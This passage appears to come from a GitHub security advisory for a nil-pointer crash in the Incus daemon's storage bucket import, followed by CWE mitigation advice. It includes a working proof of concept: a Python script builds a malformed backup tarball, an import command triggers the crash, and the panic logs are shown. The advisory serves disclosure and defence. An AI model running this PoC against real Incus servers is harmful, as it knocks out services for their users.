backup.Info, srcData io.ReadSeeker, op *operations.Operation) error {\n [...]\n bucketRequest := api.StorageBucketsPost{\n Name: srcBackup.Name,\n StorageBucketPut: srcBackup.Config.Bucket.StorageBucketPut,\n }\n\n // Create the bucket to import.\n err = b.CreateBucket(srcBackup.Project, bucketRequest, op)\n if err != nil {\n return err\n }\n\n reverter.Add(func() { _ = b.DeleteBucket(srcBackup.Project, bucketRequest.Name, op) })\n\n // Upload all keys from the backup.\n for _, bucketKey := range srcBackup.Config.BucketKeys {\n bucketKeyRequest := api.StorageBucketKeysPost{\n Name: bucketKey.Name,\n StorageBucketKeyPut: bucketKey.StorageBucketKeyPut,\n }\n\n _, err := b.CreateBucketKey(srcBackup.Project, srcBackup.Name, bucketKeyRequest, op)\n if err != nil {\n return err\n }\n }\n\n // Upload all files from the backup.\n backupKey, err := b.getFirstAdminStorageBucketPoolKey(srcBackup.Project, srcBackup.Name)\n if err != nil {\n return err\n }\n\n [...]\n}\n```\n\n### PoC\nThe following PoC demonstrates that a malformed bucket backup archive with an index.yaml file that omits the config block can trigger a nil-pointer dereference and crash the incusd daemon during bucket import.\n\nStep 1: Create the malformed archive\n\nFrom a client or workstation with Python available, generate a minimal bucket backup archive whose index.yaml omits the config section.\n\nCommands:\n```\ncat \u003c\u003cEOF \u003e poc_bucket_nil.py\nimport tarfile\nimport io\n\nindex_content = b\"name: dos-trigger\\n\"\n\nwith tarfile.open(\"nil_panic.tar.gz\", \"w:gz\") as tar:\n info = tarfile.TarInfo(name=\"backup/index.yaml\")\n info.size = len(index_content)\n tar.addfile(info, io.BytesIO(index_content))\n\nprint(\"[+] Nil-Pointer PoC Tarball created: nil_panic.tar.gz\")\nEOF\n\npython3 poc_bucket_nil.py\n```\n\nResult:\n```\n[+] Nil-Pointer PoC Tarball created: nil_panic.tar.gz\n```\n\nStep 2: Trigger the vulnerable bucket import path\n\nFrom an Incus client with permission to import storage buckets, import the crafted archive into any valid storage pool.\n\nCommand:\n```\nincus storage bucket import local-pool nil_panic.tar.gz crash-test\n```\n\nResult:\n```\nError: Operation not found\n```\n\nStep 3: Verify the daemon panic\n\nOn the Incus host, inspect the service logs and confirm that the daemon terminated with a nil-pointer panic in the bucket import path.\n\nCommand:\n```\njournalctl -u incus --since \"3 minutes ago\" | grep -A 15 \"panic\"\n```\n\nResult:\n```\nMar 23 17:19:11 incus-7a incusd[237735]: panic: runtime error: invalid memory address or nil pointer dereference\nMar 23 17:19:11 incus-7a incusd[237735]: [signal SIGSEGV: segmentation violation code=0x1 addr=0x60 pc=0x168a223]\nMar 23 17:19:11 incus-7a incusd[237735]: goroutine 9635 [running]:\nMar 23 17:19:11 incus-7a incusd[237735]: github.com/lxc/incus/v6/internal/server/storage.(*backend).CreateBucketFromBackup(0x254e0c0706c0, {{0x254e0cd77263, 0x9}, {0x254e0c408ce0, 0xa}, {0x0, 0x0}, {0x254e0c964c48, 0xa}, {0x0, ...}, ...}, ...)\nMar 23 17:19:11 incus-7a incusd[237735]: /home/stgraber/Code/lxc/incus/internal/server/storage/backend.go:7754 +0x303\nMar 23 17:19:11 incus-7a incusd[237735]: main.createStoragePoolBucketFromBackup.func3(0x191ca65?)\nMar 23 17:19:11 incus-7a incusd[237735]: /home/stgraber/Code/lxc/incus/cmd/incusd/storage_buckets.go:1467 +0x19c\nMar 23 17:19:11 incus-7a incusd[237735]: github.com/lxc/incus/v6/internal/server/operations.(*Operation).Start.func1(0x254e0c333400)\nMar 23 17:19:11 incus-7a incusd[237735]: /home/stgraber/Code/lxc/incus/internal/server/operations/operations.go:307 +0x26\nMar 23 17:19:11 incus-7a incusd[237735]: created by github.com/lxc/incus/v6/internal/server/operations.(*Operation).Start in goroutine 9576\nMar 23 17:19:11 incus-7a incusd[237735]: /home/stgraber/Code/lxc/incus/internal/server/operations/operations.go:306 +0x105\nMar 23 17:19:11 incus-7a systemd[1]: incus.service: Main process exited, code=exited, status=2/INVALIDARGUMENT\nMar 23 17:19:11 incus-7a systemd[1]: incus.service: Failed with result \u0027exit-code\u0027.\nMar 23 17:19:11 incus-7a systemd[1]: incus.service: Unit process 159855 (qemu-system-x86) remains running after unit stopped.\nMar 23 17:19:11 incus-7a systemd[1]: incus.service: Unit process 237808 (dnsmasq) remains running after unit stopped.\nMar 23 17:19:11 incus-7a systemd[1]: incus.service: Unit process 237825 (dnsmasq) remains running after unit stopped.\n```\n\nIt is recommended to validate that srcBackup.Config is not nil before attempting to access its members. If the required configuration metadata is missing from the archive, the function should return a structured error and abort the operation gracefully rather than allowing a runtime panic to crash the service.\n\n### Credit\nThis issue was discovered and reported by the team at 7asecurity (https://7asecurity.com/)",
"id": "GHSA-gc7j-g665-rxr9",
"modified": "2026-05-08T19:26:20Z",
"published": "2026-05-04T17:40:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lxc/incus/security/advisories/GHSA-gc7j-g665-rxr9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40195"
},
{
"type": "PACKAGE",
"url": "https://github.com/lxc/incus"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Incus has a Nil-Pointer Dereference Panic via Bucket Metadata"
}
Mitigation MIT-56
For any pointers that could have been modified or provided from a function that can return NULL, check the pointer for NULL before use. When working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the check, and unlock when it has finished [REF-1484].
Mitigation
Select a programming language that is not susceptible to these issues.
Mitigation
Check the results of all functions that return a value and verify that the value is non-null before acting upon it.
Mitigation
Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.
Mitigation
Explicitly initialize all variables and other data stores, either during declaration or just before the first usage.
No CAPEC attack patterns related to this CWE.